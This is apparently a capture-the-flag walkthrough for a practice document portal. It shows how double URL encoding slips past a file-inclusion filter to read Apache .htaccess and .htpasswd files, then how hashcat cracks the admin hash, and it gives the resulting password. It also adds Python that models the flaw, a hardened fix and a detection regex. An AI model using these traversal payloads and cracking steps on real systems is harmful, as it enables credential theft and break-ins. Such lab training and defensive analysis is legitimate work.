This corporate document portal implements dynamic file inclusion with security filters to prevent unauthorized access, but experienced attackers know that basic protections often have weaknesses. 🛡️ The system blocks directory traversal and PHP file inclusion, but what about other sensitive files that might be lurking in the web directory? 💡 Master the art of filter bypass and discover how to extract authentication credentials from protected areas! 🔓
Navigate to
to access the SecureCorp Document Portal. Notice the URL structure when clicking on different sections:
http:///index.php?page=about
http:///index.php?page=contact
http:///index.php?page=documents
The application uses the page parameter to dynamically include content files based on user input.
The application implements security measures to prevent common attacks:
# Directory traversal (blocked)
http:///index.php?page=../etc/passwd
# Result: "Security violation detected!"
# Forward slash (blocked)
http:///index.php?page=admin/test
# Result: "Path traversal not allowed!"
# PHP file inclusion (blocked)
http:///index.php?page=index.php
# Result: "PHP files cannot be included!"
The "Admin" link in the navigation points to /admin/
. Accessing it directly triggers HTTP Basic Authentication:
http:///admin/
This indicates the directory is protected by Apache .htaccess and .htpasswd files.
The key vulnerability is the order of operations: the web server decodes the query string once before the application's security checks run, and the application then applies a second URL decode after the checks have passed, immediately before the include. We can bypass the forward slash restriction using double URL encoding:
# Single encoding %2F gets decoded to / before security check (blocked)
# Double encoding %252F gets decoded to %2F, passes security check,
# then gets decoded again to / during file inclusion
# Access .htaccess file
http:///index.php?page=admin%252F.htaccess
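The decode-after-check ordering above, modelled as an added example (not the lab's own PHP source, which the page does not show). The check order, the error strings, and the names WEB_ROOT, ALLOWED_PAGES, vulnerable_resolve, hardened_resolve and looks_double_encoded are assumptions; the hardened variant decodes exactly once and replaces the blocklist with an allowlist, and the last helper is for reviewing access logs for double-encoded requests.

```python
import posixpath
import re
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"                          # assumed document root
ALLOWED_PAGES = {"about", "contact", "documents"}   # pages linked from the portal nav


def filter_check(page: str):
    """The three blocklist checks the portal applies to the (once-decoded) parameter."""
    if ".." in page:
        return "Security violation detected!"
    if "/" in page:
        return "Path traversal not allowed!"
    if page.lower().endswith(".php"):
        return "PHP files cannot be included!"
    return None


def vulnerable_resolve(raw_query_value: str) -> str:
    """Server decodes once, app checks, then app decodes AGAIN before include (the bug)."""
    page = unquote(raw_query_value)       # first decode: done by the web server
    error = filter_check(page)            # %2F is not '/', so the check passes
    if error:
        return error
    page = unquote(page)                  # second decode turns %2F into '/'
    return posixpath.join(WEB_ROOT, page)


def hardened_resolve(raw_query_value: str) -> str:
    """Decode exactly once, allowlist the page name, and confine the path to WEB_ROOT."""
    page = unquote(raw_query_value)
    if page not in ALLOWED_PAGES:
        return "Unknown page"
    # Assumed mapping of page name to a static content file.
    target = posixpath.normpath(posixpath.join(WEB_ROOT, page + ".html"))
    if not target.startswith(WEB_ROOT + "/"):
        return "Path traversal not allowed!"
    return target


# A request URI that still contains %25xx after the server's single decode was
# double-encoded by the client; legitimate links from this portal never are.
DOUBLE_ENCODED = re.compile(r"%25[0-9A-Fa-f]{2}")


def looks_double_encoded(request_uri: str) -> bool:
    """Access-log triage: flag request URIs carrying a double-encoded sequence."""
    return bool(DOUBLE_ENCODED.search(request_uri))
```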
Use the double encoding technique to access both Apache authentication files:
# Extract .htaccess configuration
http:///index.php?page=admin%252F.htaccess
# Extract .htpasswd password file
http:///index.php?page=admin%252F.htpasswd
The .htaccess file reveals the authentication configuration:
AuthType Basic
AuthName "SecureCorp Administrative Area"
AuthUserFile /var/www/html/admin/.htpasswd
Require valid-user
The .htpasswd file contains the hashed password:
admin:$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0
The hash format $apr1$ indicates Apache APR1 MD5. Use online tools or command-line utilities to crack it:
# Using online hash crackers like hashkiller.io or crackstation.net
# Or use hashcat/john the ripper:
echo '$apr1$fb5V6tuj$9x0nfH7mvVp9Z.64XmnPW0' > hash.txt
hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
The APR1 hash cracks to the password: admin1020304050
Use the cracked credentials to access the protected admin area:
Navigate to http:// and enter these credentials when prompted by HTTP Basic Authentication.
After successful authentication, you'll access the SecureCorp Admin Panel. The flag is displayed in the "System Security Token" section: